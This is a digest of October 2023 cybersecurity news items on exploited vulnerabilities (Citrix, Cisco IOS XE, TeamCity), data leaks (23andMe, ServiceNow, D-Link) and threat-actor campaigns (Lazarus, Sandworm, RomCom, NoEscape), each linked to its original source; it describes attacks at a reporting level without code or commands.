Critical Citrix NetScaler Bug Exploited in the Wild Since August

A critical zero-day vulnerability affecting Citrix NetScaler Application Delivery Controller (ADC) and NetScaler Gateway has been actively exploited by malicious actors, raising alarms in the government and technology sectors.

As a result, organisations are being urged to patch their systems immediately to avoid potential data breaches and security compromises.

Citrix recently addressed two unauthenticated buffer-related vulnerabilities, indexed as CVE-2023-4966 and CVE-2023-4967, both of which affected multiple versions of NetScaler ADC and NetScaler Gateway.

However, on Tuesday, Citrix revised its advisory to emphasise that exploits of CVE-2023-4966 on unpatched appliances have been observed in the wild.

The vulnerability affects the following versions of NetScaler ADC and Gateway appliances:

• NetScaler ADC and NetScaler Gateway 14.1 before 14.1-8.50
• NetScaler ADC and NetScaler Gateway 13.1 before 13.1-49.15
• NetScaler ADC and NetScaler Gateway 13.0 before 13.0-92.19
• NetScaler ADC 13.1-FIPS before 13.1-37.164
• NetScaler ADC 12.1-FIPS before 12.1-55.300
• NetScaler ADC 12.1-NDcPP before 12.1-55.300

NetScaler ADC 12.1, which is now End-of-Life (EOL), remains vulnerable to the exploit.

Only appliances configured as Gateways (VPN virtual servers, ICA Proxy, CVPN, and RDP Proxy) or authorisation and accounting (AAA) virtual servers are susceptible. Customers utilising Citrix-managed cloud services or Citrix-managed Adaptive Authentication are not affected.

The cybercampaign primarily targeted professional services, technology firms and government organisations.Most alarming is t he threat actors’ demonstrated multifactor authentication (MFA) bypass techniques, necessitating additional measures beyond patching safeguard systems.

Successful exploitation of CVE-2023-4966 could enable attackers to hijack existing authenticated sessions, thereby circumventing MFA and other robust authentication measures.

These compromised sessions could persist even after the implementation of the CVE-2023-4966 update. Additionally, cases of session hijacking were identified where session data was pilfered prior to the installation of patches and subsequently exploited by an unidentified threat actor.

The identity of the threat actor behind these attacks remains undisclosed. Given the active exploitation of this vulnerability and the attractiveness of Citrix bugs to threat actors, it is imperative for users to act swiftly by updating their systems to the latest versions to mitigate potential threats.

This marks the second time in three months that Citrix NetScaler ADC and NetScaler Gateway have been targeted by cyberattacks. In July, Citrix issued a warning to its customers regarding a critical vulnerability, identified as CVE-2023-3519, in NetScaler ADC and NetScaler Gateway. This vulnerability had already been exploited by malicious actors.

Notably, it received a high severity score of 9.8 out of 10 and was related to a case of code injection, potentially leading to unauthenticated remote code execution.

In August, the US Cybersecurity and Infrastructure Security Agency (CISA) added a critical vulnerability in the Citrix ShareFile storage zones controller, indexed as CVE-2023-24489, in its Known Exploited Vulnerabilities (KEV) catalogue. This flaw, carrying a significant CVSS score of 9.8, was actively exploited, according to the agency’s findings.

The vulnerability allowed remote, unauthenticated attackers to compromise vulnerable Citrix ShareFile instances due to inadequate access controls when handling cryptographic operations.

Source – https://www.computing.co.uk/news/4136137/critical-citrix-netscaler-bug-exploited-wild-august

ServiceNow leak: thousands of companies at risk

Digital business platform ServiceNow has a data vulnerability that could have compromised its users for years. The company has since tacitly acknowledged the warning, though it neither confirmed nor denied it.

Types of data to have been exposed include names, email addresses, and internal documents, with “thousands of companies” likely affected.

The weak link is a misconfiguration in a component or widget in ServiceNow’s system called Simple List, which puts records into tables that are easily readable.

What’s more, the glitch has been around since the Simple List component was created in 2015. As yet, there’s no proof that it has been exploited by bad actors, though that does not necessarily mean it hasn’t.

To mitigate the issue, organizations are urged to implement internet protocol restrictions for inbound traffic, disable public widgets, or beef up their access control lists with a plugin.

ServiceNow commented on October 18th, saying it was “aware of the recent publications describing a potential misconfiguration issue.”

Though the company did not specifically confirm the reports, it pointed clients to what it described as “official guidance from ServiceNow” allowing them “to evaluate whether additional steps are needed to further secure their instances.”

It added: “We proactively work with customers on the ongoing safety of their security configurations, including Access Control Lists (ACLs), to ensure they are properly structured and aligned to their intended purpose. We make these protocols extensible so our customers can configure them based on their unique security needs – from companies with public portals providing broad access to information to enterprise-specific use cases where access is restricted to select users.”

ServiceNow said it would “continue to work closely with customers to ensure that their ACL protocols were aligned with their specific intent and purposes.”

Source – https://cybernews.com/news/servicenow-leak-thousands-companies-risk/

Hacker Leaks Millions of New 23andMe Genetic Data Profiles

A hacker has leaked an additional 4.1 million stolen 23andMe genetic data profiles for people in Great Britain and Germany on a hacking forum. Earlier this month, a threat actor leaked the stolen data of 1 million Ashkenazi Jews who used 23andMe services to find their ancestry info and genetic predispositions.

23andMe said that this data was obtained through credential stuffing attacks on accounts using weak passwords or credentials exposed in other data breaches. However, the company says there is no evidence of a security incident on their IT systems.

The company says that only a limited number of accounts were breached, but they opted into the ‘DNA Relatives’ feature, allowing the threat actor to scrape millions of individual’s data.

Yesterday, a threat actor named ‘Golem,’ who is allegedly behind the 23andMe attacks, leaked an additional 4.1 million data profiles of people in Great Britain and Germany on the BreachForums hacking forum.

This additional leak includes 4,011,607 lines of 23andMe data for people living in Great Britain. The threat actors claim that the stolen data includes genetic information on the royal family, the Rothschilds, and the Rockefellers.

“You can see the wealthiest people living in the US and Western Europe on this list,” the hackers say in the below forum post.

Today, the same hacker released an additional CSV file containing the 23andMe data of 139,172 people living in Germany.

It has been reported that some of the leaked 23andMe data was being sold in August 2023 on the now-shutdown Hydra hacking forum, where the threat actor claimed to have stolen 300 terabytes of data. The threat actor on BreachForums also claims to have “hundreds of TBs of data” in their possession, likely indicating that this is the same stolen data.

While 23andMe says that only a small number of customer accounts were breached, the DNA Relatives feature turned this into a significantly larger data leak. These leaks have already led to a myriad of lawsuits against 23andMe that claim there is a lack of information about the breach and that the company did not adequately protect customers’ data.

Source – https://www.bleepingcomputer.com/news/security/hacker-leaks-millions-of-new-23andme-genetic-data-profiles/

D-Link Says Hacker Exaggerated Data Breach Claims

D-Link has launched an investigation after a hacker offered to sell information allegedly stolen from one of its networks and has determined that the claims are exaggerated.

On October 1, a user of the new BreachForums cybercrime website claimed they had breached the internal network of D-Link in Taiwan, which gave them access to a database storing the information of 3 million customers, as well as source code for the D-View network monitoring product. 

The hacker claimed to have stolen 1.2 Gb of data, including names, email addresses, postal addresses, phone numbers, and the time and date of the last login, and offered to sell the files for $500. 

“This does include the information of MANY government officials in Taiwan, as well as the CEOs and employees of the company,” said the seller, who also made available a small sample to demonstrate their claims. 

D-Link said it learned of the hacker forum post on October 2 and conducted an investigation. The probe has been completed and the networking equipment maker has confirmed suffering a data breach, but described the hacker’s claims as inaccurate, exaggerated and misleading. 

“The data was confirmed not from the cloud but likely originated from an old D-View 6 system, which reached its end of life as early as 2015. The data was used for registration purposes back then. So far, no evidence suggests the archaic data contained any user IDs or financial information. However, some low-sensitivity and semi-public information, such as contact names or office email addresses, were indicated,” the company explained. 

D-Link said the attacker gained access to its systems after an employee fell victim to a phishing attack. However, it believes impact is limited — its operations are not affected and neither are customers. 

The company pointed out several exaggerations and inaccuracies in the hacker’s post. D-Link claims that only 700 records were actually compromised, not 3 million, and noted that the hacker may have altered the login timestamps to make the data look more recent than it actually is. 

Source – https://www.securityweek.com/d-link-says-hacker-exaggerated-data-breach-claims/

Lazarus Group Targeting Defense Experts with Fake Interviews via Trojanized VNC Apps

The North Korea-linked Lazarus Group (aka Hidden Cobra or TEMP.Hermit) has been observed using trojanized versions of Virtual Network Computing (VNC) apps as lures to target the defense industry and nuclear engineers as part of a long-running campaign known as Operation Dream Job.

The threat actor tricks job seekers on social media into opening malicious apps for fake job interviews. To avoid detection, this backdoored application operates discreetly, only activating when the user selects a server from the drop-down menu of the Trojanized VNC client.

Once launched by the victim, the counterfeit app is designed to retrieve additional payloads, including a known Lazarus Group malware dubbed LPEClient, which comes fitted with capabilities to profile compromised hosts.

Also deployed by the adversary is an updated version of COPPERHEDGE, a backdoor known for running arbitrary commands, performing system reconnaissance, and exfiltrating data, as well as a bespoke malware specifically meant for transmitting files of interest to a remote server.

Targets of the latest campaign comprise businesses that are directly involved in defense manufacturing, including radar systems, unmanned aerial vehicles (UAVs), military vehicles, ships, weaponry, and maritime companies.

Operation Dream Job refers to a series of attacks orchestrated by the North Korean hacking outfit in which potential targets are contacted via suspicious accounts via various platforms such as LinkedIn, Telegram, and WhatsApp under the pretext of offering lucrative job opportunities to trick them into installing malware.

Late last month, details of a Lazarus Group attack aimed at an unnamed aerospace company in Spain in which employees of the firm were approached by the threat actor posing as a recruiter for Meta on LinkedIn to deliver an implant named LightlessCan.

Lazarus Group is just one of the many offensive programs originating from North Korea that have been linked to cyber espionage and financially motivated thefts.

Another prominent hacking crew is APT37 (aka ScarCruft), which is part of the Ministry of State Security, unlike other threat activity clusters – i.e., APT43, Kimsuky, and Lazarus Group (and its sub-groups Andariel and BlueNoroff) – that are affiliated with the Reconnaissance General Bureau (RGB).

Source – https://thehackernews.com/2023/10/lazarus-group-targeting-defense-experts.html

Ukrainian Activists Hack Trigona Ransomware Gang, Wipe Servers

A group of cyber activists under the Ukrainian Cyber Alliance banner has hacked the servers of the Trigona ransomware gang and wiped them clean after copying all the information available.

The Ukrainian Cyber Alliance fighters say they exfiltrated all of the data from the threat actor’s systems, including source code and database records, which may include decryption keys.

Ukrainian Cyber Alliance hackers gained access to Trigona ransomware’s infrastructure by using a public exploit for CVE-2023-22515, a critical vulnerability in Confluence Data Center and Server that can be leveraged remotely to escalate privileges.

The vulnerability was leveraged in attacks as a zero-day since September 14 by at least one threat group that Microsoft tracks as Storm-0062 (also known as DarkShadow and Oro0lxy).

The Ukrainian Cyber Alliance, or UCA for short, first breached Trigona ransomware’s Confluence server about six days ago, established persistence, and mapped the cybercriminal’s infrastructure completely unnoticed.

After a UCA activist using the handle herm1t published screenshots of the ransomware gang’s internal support documents, Trigona ransomware initially panicked and responded by changing the password and taking down its public-facing infrastructure.

However, over the next week, the activists managed to take all the information from the threat actor’s administration and victim panels, their blog and data leak site, and internal tools (Rocket.Chat, Jira, and Confluence servers).

herm1t said that they also exfiltrated the developer environment, cryptocurrency hot wallets as well as the source code and database records.

The activists don’t know if the information they transferred contains any decryption keys but they said they would release them if found.

After harvesting all available data from the ransomware gang, the UCA activists deleted and defaced their sites, also sharing the key for the administration panel site.

UCA claims that they were able to retrieve three backups with hundreds of gigabytes of likely stolen documents.

The Trigona ransomware operation emerged under this name in late October last year, when the gang launched a Tor site to negotiate ransom payments in Monero cryptocurrency with victims of their attacks.

Previously, samples of the malware had no specific name and were observed in the wild since the beginning of 2022. Before the Trigona branding, the operators used email to negotiate the ransom payments.

For a while, the cybercriminals were sufficiently active to compromise in a single month at least 15 companies in the manufacturing, finance, construction, agriculture, marketing, and high technology sectors.

Earlier this year, Trigona hackers were targeting Microsoft SQL servers exposed on the public internet using brute-force or dictionary attacks to obtain access credentials.

At the moment, due to the Ukrainian Cyber Alliance’s recent actions, none of the Trigona ransomware public websites and services are online.

Source – https://www.bleepingcomputer.com/news/security/ukrainian-activists-hack-trigona-ransomware-gang-wipe-servers/

JetBrains Vulnerability Being Exploited by North Korean Gov’t Hackers, Microsoft says

Multiple groups of hackers tied to North Korea’s government are targeting a vulnerability that emerged earlier this year in a popular product from Czech software giant JetBrains, Microsoft says.

Two groups tracked by Microsoft as Diamond Sleet and Onyx Sleet were seen exploiting CVE-2023-42793 — a bug found last month that affects a product called TeamCity, which is used by developers to test and exchange software code before its release.

The company published a patch for the issue on September 20 but the subsequent release of technical details led to immediate exploitation by a range of ransomware groups, according to researchers at PRODRAFT. More than 1,200 unpatched servers vulnerable to the issue were discovered.

Microsoft said on Wednesday that it has been notifying customers who are being targeted or who have already been compromised.

“While the two threat actors are exploiting the same vulnerability, Microsoft observed Diamond Sleet and Onyx Sleet utilizing unique sets of tools and techniques following successful exploitation,” Microsoft said.

“Based on the profile of victim organizations affected by these intrusions, Microsoft assesses that the threat actors may be opportunistically compromising vulnerable servers. However, both actors have deployed malware and tools and utilized techniques that may enable persistent access to victim environments,” they wrote.

Diamond Sleet was witnessed deploying backdoors through their compromise of the vulnerability — allowing them continuous access to a victim’s system. Onyx Sleet, meanwhile, creates a new user account on the compromised system and gives it administrator-level access.

From there, Onyx Sleet tries to steal credentials and other data stored by browsers while also stopping the TeamCity service, “likely in an attempt to prevent access by other threat actors.”

Microsoft did not respond to requests for comment about what organizations were attacked in the campaigns and what the overall goal was.

But both groups have been tracked by security companies and researchers for years. Onyx Sleet typically targets defense and IT services organizations in South Korea, the United States, and India.

Last year, Microsoft accused Onyx Sleet of creating the H0lyGh0st ransomware and using it to attack small businesses in several countries since September 2021.

The group went after manufacturing organizations, banks, schools, and event and meeting planning companies — demanding ransoms of up to 5 Bitcoins (about $140,000).

Diamond Sleet focuses its efforts on espionage, data theft, financial gain, and network destruction, targeting media, IT services, and defense-related entities around the world. The group made waves in September when Microsoft revealed it was targeting organizations in Russia, one of North Korea’s few allies.

Microsoft warned two weeks ago that hackers connected to Diamond Sleet were weaponizing legitimate open-source software.

JetBrains TeamCity, which is used by developers at Fortune 100 companies, was previously implicated in the SolarWinds fiasco by The New York Times, which attributed the wide-ranging hack to backdoors planted in an untold number of clients using TeamCity.

When first discovered, CVE-2023-42793 caused significant alarm among researchers who explained that it could be used by hackers to take over a development pipeline, allowing them to move throughout a company’s internal network and do extensive damage.

Source – https://therecord.media/teamcity-vulnerability-targeted-by-nk-hackers

Discord: A Playground for Nation-State Hackers Targeting Critical Infrastructure

In what’s the latest evolution of threat actors abusing legitimate infrastructure for nefarious ends, new findings show that nation-state hacking groups have entered the fray in leveraging the social platform for targeting critical infrastructure.

Discord, in recent years, has become a lucrative target, acting as a fertile ground for hosting malware using its content delivery network (CDN) as well as allowing information stealers to siphon sensitive data off the app and facilitating data exfiltration by means of webhooks.

The usage of Discord is largely limited to information stealers and grabbers that anyone can buy or download from the Internet. But that may be changing, as evidence was found of an artifact targeting Ukrainian critical infrastructures. There is currently no evidence linking it to a known threat group.

The potential emergence of APT malware campaigns exploiting Discord’s functionalities introduces a new layer of complexity to the threat landscape.

The sample is a Microsoft OneNote file distributed via an email message impersonating the non-profit dobro.ua.

The file, once opened, contains references to Ukrainian soldiers to trick recipients into donating by clicking on a booby-trapped button, resulting in the execution of Visual Basic Script (VBS) designed to extract and run a PowerShell script in order to download another PowerShell script from a GitHub repository.

For its part, in the final stage, PowerShell takes advantage of a Discord webhook to exfiltrate system metadata.

The fact that the only goal of the final payload is obtaining information about the system indicates that the campaign is still in an early stage, which also fits with the usage of Discord as [command-and-control]. However, it is important to highlight that the actor could deliver a more sophisticated piece of malware to the compromised systems in the future by modifying the file stored in the GitHub repository.

Researcher analysis further revealed that loaders such as SmokeLoader, PrivateLoader, and GuLoader are among the most prevalent malware families that utilize Discord’s CDN to download a next-stage payload, including stealers like RedLine, Vidar, Agent Tesla, and Umbral.

On top of that, some of the common malware families that have been observed using Discord webhooks are Mercurial Grabber, Stealerium, Typhon Stealer, and Venom RAT.

The abuse of Discord’s CDN as a distribution mechanism for additional malware payloads showcases the adaptability of cybercriminals to exploit collaborative applications for their gain.

APTs are known for their sophisticated and targeted attacks, and by infiltrating widely used communication platforms like Discord, they can efficiently establish long-term footholds within networks, putting critical infrastructure and sensitive data at risk.

Source – https://thehackernews.com/2023/10/discord-playground-for-nation-state.html

Unpatched Cisco Zero-Day Vulnerability Actively Targeted in the Wild

Cisco has warned of a critical, unpatched security flaw impacting IOS XE software that’s under active exploitation in the wild.

Rooted in the web UI feature, the zero-day vulnerability is tracked as CVE-2023-20198 and has been assigned the maximum severity rating of 10.0 on the CVSS scoring system.

It’s worth pointing out that the shortcoming only affects enterprise networking gear that have the web UI feature enabled and when it’s exposed to the internet or to untrusted networks.

“This vulnerability allows a remote, unauthenticated attacker to create an account on an affected system with privilege level 15 access,” Cisco said in a Monday advisory. “The attacker can then use that account to gain control of the affected system.”

The problem impacts both physical and virtual devices running Cisco IOS XE software that also have the HTTP or HTTPS server feature enabled. As a mitigation, it’s recommended to disable the HTTP server feature on internet-facing systems.

The networking equipment major said it discovered the problem after it detected malicious activity on an unidentified customer device as early as September 18, 2023, in which an authorized user created a local user account under the username “cisco_tac_admin” from a suspicious IP address. The unusual activity ended on October 1, 2023.

In a second cluster of related activity that was spotted on October 12, 2023, an unauthorized user created a local user account under the name “cisco_support” from a different IP address.

This is said to have been followed by a series of actions that culminated in the deployment of a Lua-based implant that allows the actor to execute arbitrary commands at the system level or IOS level.

The installation of the implant is achieved by exploiting CVE-2021-1435, a now-patched flaw impacting the web UI of Cisco IOS XE Software, as well as an as-yet-undetermined mechanism in cases where the system is fully patched against CVE-2021-1435.

“For the implant to become active, the web server must be restarted; in at least one observed case the server was not restarted so the implant never became active despite being installed,” Cisco said.

The backdoor, saved under the file path “/usr/binos/conf/nginx-conf/cisco_service.conf,” is not persistent, meaning it will not survive a device reboot. That said, the rogue privileged accounts that are created continue to remain active.

Cisco has attributed the two sets of activities to presumably the same threat actor, although the adversary’s exact origins are presently cloudy.

“The first cluster was possibly the actor’s initial attempt and testing their code, while the October activity seems to show the actor expanding their operation to include establishing persistent access via deployment of the implant,” the company noted.

The development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an advisory and add the flaw to the Known Exploited Vulnerabilities (KEV) catalog.

In April 2023, U.K. and U.S. cybersecurity and intelligence agencies alerted of state-sponsored campaigns targeting global network infrastructure, with Cisco stating that Route/switch devices are a “perfect target for an adversary looking to be both quiet and have access to important intelligence capability as well as a foothold in a preferred network.”

Threat actors have exploited CVE-2023-20198 to compromise and infect thousands of Cisco IOS XE devices with malicious implants, according to a new report from VulnCheck, which has released a scanner to detect the implant on affected devices.

Source – https://thehackernews.com/2023/10/warning-unpatched-cisco-zero-day.html

NoEscape Ransomware Emerges, Targeting Healthcare

A suspected successor of Avaddon ransomware, NoEscape ransomware uses multi-extortion tactics to target multiple industries, including healthcare, HC3 warned.

The Health Sector Cybersecurity Coordination Center (HC3) issued an analyst note regarding NoEscape ransomware, a new threat to healthcare and other industries. Although just two healthcare victims have been claimed by the group so far, NoEscape’s willingness to target healthcare is worrisome for the sector.

NoEscape only emerged in May 2023 but has already made a name for itself by using aggressive tactics to extort victims. NoEscape is believed to be a successor of Avaddon, a ransomware group that was shut down in 2021.

“Unlike many of its contemporaries, however, the unknown developers of this ransomware claim that in lieu of using source code or leaks from other established ransomware families, they have constructed their malware and its associated infrastructure entirely from scratch,” HC3 noted.

The Ransomware-as-a-Service (RaaS) group has been observed encrypting files on a victim’s computer and demanding ransoms, as well as providing services to fellow cybercriminals.

HC3 provided technical details about the group’s tactics that healthcare defenders can use to gain knowledge about the group’s techniques. For example, HC3 noted that the group can only execute on a Windows NT 10.0 operating system, but it is capable of encrypting data on Windows and Linux machines, along with VMware ESXi.

Nearly a quarter of NoEscape’s observed attacks have been targeted at US-based organizations and has been known to demand ransoms ranging from hundreds of thousands of dollars to more than $10 million.

“Since NoEscape operates as a RaaS, its targets vary depending on the affiliate and the buyer. Its creators, like many ransomware gangs, do not target Commonwealth of Independent States (CIS), or ex-Soviet Union republics, while disproportionately targeting the United States and several European countries as its preferred victims,” the analyst note continued.

“The service allows operators and affiliates to take advantage of multi-extortion tactics, including triple extortion methods to maximize the impact of a successful attack,” HC3 continued.

HC3 recommended that defenders continue to prioritize ransomware mitigations, such as regular software updates, backups, and strong passwords. As always, employee education and training remains crucial to reducing risk.

“The probability of cyber threat actors targeting any industry remains high, but especially so for the Healthcare and Public Health sector,” HC3 warned. “Prioritizing security by maintaining awareness of the threat landscape, assessing their situation, and providing staff with tools and resources necessary to prevent a cyberattack remains the best way forward for healthcare organizations.”

Source – https://healthitsecurity.com/news/noescape-ransomware-emerges-targeting-healthcare

New RomCom Backdoor Targets Female Political Leaders

Researchers have uncovered a new malicious campaign targeting female political leaders and attendees of the Women Political Leaders (WPL) Summit held in Brussels in June 2023.

The treat actors, Void Rabisu, started deploying a new version of its RomCom backdoor – which is being tracked as RomCom 4.0 and Microsoft as Peapod – in early August 2023, and reported in a malware analysis published on October 13.

The backdoor payload was hidden in a malicious copy of the official website of the WPL Summit, which aims to improve gender equality in politics.

While the ‘Videos & photos’ link of the legitimate domain redirects visitors to a Google Drive folder containing photographs from the event, the wplsummit[.]com fake website directed visitors to a OneDrive folder containing two compressed files and an executable called Unpublished Pictures 1-20230802T122531-002-sfx.exe. The latter file appears to be a piece of malware.

This tactic is similar to a previous Void Rabisu campaign in June, where the group used the Ukrainian World Congress and the July 2023 NATO summit as lures to deploy a zero-day exploit based on the CVE-2023-36884 vulnerability, a remote code execution flaw in Office and Windows HTML. This campaign was reported by Microsoft in July.

Additionally, Void Rabisu is using a new technique in its latest campaigns that has not previously been reported on. The technique involves a TLS-enforcing technique by the RomCon command-and-control (C2) servers that can render the automated discovery of RomCom infrastructure more difficult.

Void Rabisu used this technique in a May 2023 RomCom campaign that spread a malicious copy of the legitimate PaperCut software, in which the C2 server ignored requests that were not conformant.

Void Rabisu, also known as Storm-0978, Tropical Scorpius, and UNC2596, is a hybrid threat actor conducting financially motivated and espionage attacks. The group was first identified in early 2022 but is believed to have been active for longer than that. It was initially considered a financially motivated threat actor because of its associated Cuba ransomware.

However, in August 2022, Cuba ransomware was involved in an attack targeting the parliament of Montenegro. This led security researchers to assume the group was pursuing a geopolitical agenda.

This hypothesis was later confirmed as Void Rabisu started targeting the Ukrainian government and military, their energy and water utility sectors as well as EU politicians and government spokespersons.

Source – https://www.infosecurity-magazine.com/news/romcom-backdoor-female-political/

Russian Sandworm Hackers Breached 11 Ukrainian Telcos Since May

The state-sponsored Russian hacking group tracked as ‘Sandworm’ has compromised eleven telecommunication service providers in Ukraine between May and September 2023.

That is based on a new report by Ukraine’s Computer Emergency Response Team (CERT-UA) citing ‘public resources’ and information retrieved from some breached providers.

The agency states that the Russian hackers “interfered” with the communication systems of 11 telcos in the country, leading to service interruptions and potential data breaches.

Sandworm is a very active espionage threat group linked to Russia’s GRU (armed forces). The attackers have focused on Ukraine throughout 2023, using phishing lures, Android malware, and data-wipers.

The attacks begin with Sandworm performing reconnaissance on telecommunication company’s networks using the ‘masscan’ tool to perform scans on the target’s network.

Sandworm looks for open ports and unprotected RDP or SSH interfaces they can leverage to breach the network.

Additionally, the attackers use tools like ‘ffuf’, ‘dirbuster’, ‘gowitness’, and ‘nmap’ to find potential vulnerabilities in web services that can be exploited to gain access.

Compromised VPN accounts that weren’t protected by multi-factor authentication have also been leveraged to gain network access.

To make their intrusions stealthier, Sandworm uses ‘Dante’, ‘socks5,’ and other proxy servers to route their malicious activities through servers within the Ukrainian internet region they compromised previously, making it appear less suspicious.

CERT-UA reports seeing two backdoors in breached ISP systems, namely ‘Poemgate’ and ‘Poseidon.’

Poemgate captures the credentials of admins who attempt to authenticate in the compromised endpoint, providing the attackers with access to additional accounts they can use for lateral movement or deeper network infiltration.

Poseidon is a Linux backdoor that the Ukrainian agency says “includes the full range of remote computer control tools.” Persistence for Poseidon is achieved by modifying Cron to add rogue jobs.

Sandworm uses the ‘Whitecat’ tool to remove the attack’s traces and delete access logs.

At the final stages of the attack, the hackers were seen deploying scripts that would cause service disruption, especially focusing on Mikrotik equipment, and wipe backups to make recovery more challenging.

CERT-UA advises that all service providers in the country follow the recommendations in this guide to make it harder for cyber intruders to breach their systems.

Source – https://www.bleepingcomputer.com/news/security/russian-sandworm-hackers-breached-11-ukrainian-telcos-since-may/

Smarttech247